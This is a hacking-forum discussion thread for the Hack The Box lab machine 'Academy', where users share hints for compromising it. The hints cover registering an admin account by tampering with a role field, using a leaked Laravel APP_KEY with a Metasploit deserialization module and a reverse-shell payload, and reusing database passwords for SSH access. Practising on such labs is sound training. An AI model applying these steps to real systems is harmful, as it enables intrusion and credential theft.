TUTORIAL Academy Discussion
by Ro0ted - November 07, 2020 at 09:49 PM
If anyone have any hints for the box, feel free to post here :)
Registered a user with the admin role by changing role from 0 to 1 in request - from there logged into /admin.php panel and saw tasks completed. Added dev/staging subdomain to hosts and saw laravel debug info - db creds leaked but haven't been able to do anything with them.
port 33060 open but haven't had any luck with mysql cli. :/

any help?
Anything guys please help confused a little after getting creds tried smtp but hey please help
use metasploit module with app_key
(November 07, 2020 at 11:20 PM)Ro0ted Wrote: use metasploit module with app_key

set APP_KEY dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=

msf6 exploit(unix/http/laravel_token_unserialize_exec) > exploit
[*] Exploit completed, but no session was created.

Any thoughts?
Hmmmm have u set everything well
(November 07, 2020 at 11:29 PM)guest55 Wrote: Hmmmm have u set everything well

Does this look correct?
msf6 exploit(unix/http/laravel_token_unserialize_exec) > show options

Module options (exploit/unix/http/laravel_token_unserialize_exec):

  Name      Current Setting                              Required  Description
  ----      ---------------                              --------  -----------
  APP_KEY    dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=  no        The base64 encoded APP_KEY string from the .env file
  Proxies                                                  no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                                  yes      The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      80                                            yes      The target port (TCP)
  SSL        false                                        no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                                            yes      Path to target webapp
  VHOST      academy.htb                                  no        HTTP server virtual host

Payload options (cmd/unix/reverse_perl):

  Name  Current Setting  Required  Description
  ----  ---------------  --------  -----------
  LHOST  10.10.xx.xxx    yes      The listen address (an interface may be specified)
  LPORT  4444            yes      The listen port
the vhost is wrong, you have to put the vhost you found in admin panel
set vhost dev-staging-01.academy.htb

got a foothold. now what lol

looks like a bunch of users. hmmmm.

Hmmm cracked some bcrypt hashes found from linpeas but it appears its just the homestead db password: "secret"
I cant connect to forge or homestead dbs as www-data. I keep getting "Access denied for user 'XXXXX'@'localhost"

Tried to get stuff from redis but redis-cli isnt installed. Where is everyone else looking? I feel as though it's right in front of my face and I'm just missing it.

Wondering if anyone was able to connect with the info in: /var/www/html/academy/.env???

Trying to connect:
[email protected]:/var/www/html/academy$ mysql -u dev -h -D academy -p
mysql -u dev -h -D academy -p
Enter password: mySup3rP4s5w0rd!!

ERROR 1045 (28000): Access denied for user 'dev'@'localhost' (using password: YES)
password for cry0l1t3 user is in here, just su or you can ssh in
(November 08, 2020 at 12:32 AM)ragnarokhype Wrote: password for cry0l1t3 user is in here, just su or you can ssh in

Ahhhh Thank you! I didn't think of using the db password for user login. Now on to the privesc...
just rooted - what a ride

Possibly Related Threads…
Thread Author Replies Views Last Post
TUTORIAL HTB Fortress - Faraday (Discussion) slrrrR 13 1,596 1 hour ago
Last Post: orangutang
TUTORIAL HTB Overflow (Discussion) infosecsy18 11 968 2 hours ago
Last Post: slrrrR
TUTORIAL HTB Devzat [Discussion] pheonix2021 54 9,006 Yesterday at 05:03 PM
Last Post: davin7i

 Users browsing this thread: 1 Guest(s)